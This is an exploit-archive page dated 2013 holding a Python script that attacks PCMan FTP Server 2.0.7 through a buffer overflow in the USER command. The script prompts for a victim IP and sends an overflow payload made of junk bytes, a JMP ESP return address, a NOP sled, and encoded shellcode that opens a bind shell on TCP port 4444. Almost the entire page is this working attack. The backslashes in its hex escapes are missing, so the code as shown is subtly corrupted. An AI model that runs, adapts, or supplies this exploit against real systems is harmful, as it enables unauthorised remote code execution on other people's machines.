Home / exploits PCMan's FTP Server 2.0.7 Remote Root
Posted on 28 June 2013
#!/usr/bin/env python import signal from time import sleep from socket import * from sys import exit, exc_info # # Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command # Discovered and Reported******June 2013 # Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators # Exploit/Advisory*************http://infosec42.blogspot.com/ # Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) # Tested Commands*************USER (Other commands were not tested and may be vulnerable) # CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending # def sigHandle(signum, frm): # Signal handler print " [!!!] Cleaning up the exploit... [!!!] " sleep(1) exit(0) def targServer(): while True: try: server = inet_aton(raw_input(" [*] Please enter the IPv4 address of the PCMan FTP Server: >")) server = inet_ntoa(server) break except: print " [!!!] Error: Please enter a valid IPv4 address. [!!!] " sleep(1) continue return server def main(): print (""" [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command [*] Discovered and Reported******June 2013 [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators [*] Exploit/Advisory*************http://infosec42.blogspot.com/ [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable) [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(21) Cmd = "USER " #Vulnerable command JuNk = "x42" * 2004 # KERNEL32.dll 7CA58265 - JMP ESP ret = "x65x82xA5x7C" NOP = "x90" * 50 #348 Bytes Bind Shell Port TCP/4444 #msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R | #msfencode -e x86/shikata_ga_nai -c 1 -b "x0dx0ax00xf1" R shellcode = "xdbxccxbax40xb6x7dxbaxd9x74x24xf4x58x29xc9" shellcode += "xb1x50x31x50x18x03x50x18x83xe8xbcx54x88x46" shellcode += "x56x72x3ex5fx5fx7bx3ex60xffx0fxadxbbxdbx84" shellcode += "x6bxf8xa8xe7x76x78xafxf8xf2x37xb7x8dx5axe8" shellcode += "xc6x7ax2dx63xfcxf7xafx9dxcdxc7x29xcdxa9x08" shellcode += "x3dx09x70x42xb3x14xb0xb8x38x2dx60x1bxe9x27" shellcode += "x6dxe8xb6xe3x6cx04x2ex67x62x91x24x28x66x24" shellcode += "xd0xd4xbaxadxafxb7xe6xadxcex84xd7x16x74x80" shellcode += "x54x99xfexd6x56x52x70xcbxcbxefx31xfbx4dx98" shellcode += "x3fxb5x7fxb4x10xb5xa9x22xc2x2fx3dx98xd6xc7" shellcode += "xcaxadx24x47x60xadx99x1fx43xbcxe6xdbx03xc0" shellcode += "xc1x43x2axdbx88xfaxc1x2cx57xa8x73x2fxa8x82" shellcode += "xebxf6x5fxd6x46x5fx9fxcexcbx33x0cxbcxb8xf0" shellcode += "xe1x01x6dx08xd5xe0xf9xe7x8ax8axaax8exd2xc6" shellcode += "x24x35x0ex99x73x62xd0x8fx11x9dx7fx65x1ax4d" shellcode += "x17x21x49x40x01x7ex6ex4bx82xd4x6fxa4x4dx32" shellcode += "xc6xc3xc7xebx27x1dx87x47x83xf7xd7xb8xb8x90" shellcode += "xc0x40x78x19x58x4cx52x8fx99x62x3cx5ax02xe5" shellcode += "xa8xf9xa7x60xcdx94x67x2ax24xa5x01x2bx5cx71" shellcode += "x9bx56x91xb9x68x3cx2fx7bxa2xbfx8dx50x2fxb2" shellcode += "x6bx91xe4x66x20x89x88x86x85x5cx92x02xadx9f" shellcode += "xbaxb6x7ax32x12x18xd5xd8x95xcbx84x49xc7x14" shellcode += "xf6x1ax4ax33xf3x14xc7x3bx2dxc2x17x3cxe6xec" shellcode += "x38x48x5fxefx3ax8bx3bxf0xebx46x3cxdex7cx88" shellcode += "x0cx3fx1cx05x6fx16x22x79" sploit = Cmd + JuNk + ret + NOP + shellcode sploit += "x42" * (2992 - len(NOP + shellcode)) + " " try: print " [*] Creating network socket." net_sock = socket(AF_INET, SOCK_STREAM) except: print " [!!!] There was an error creating the network socket. [!!!] %s " % exc_info() sleep(1) exit(0) try: print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port) net_sock.connect((victim, port)) except: print " [!!!] There was an error connecting to %s. [!!!] %s " % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] Attempting to exploit the FTP USER command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print " [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!] %s " % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup. """ net_sock.close() except: print " [!!!] There was an error closing the network socket. [!!!] %s " % exc_info() sleep(1) exit(0) if __name__ == "__main__": main()
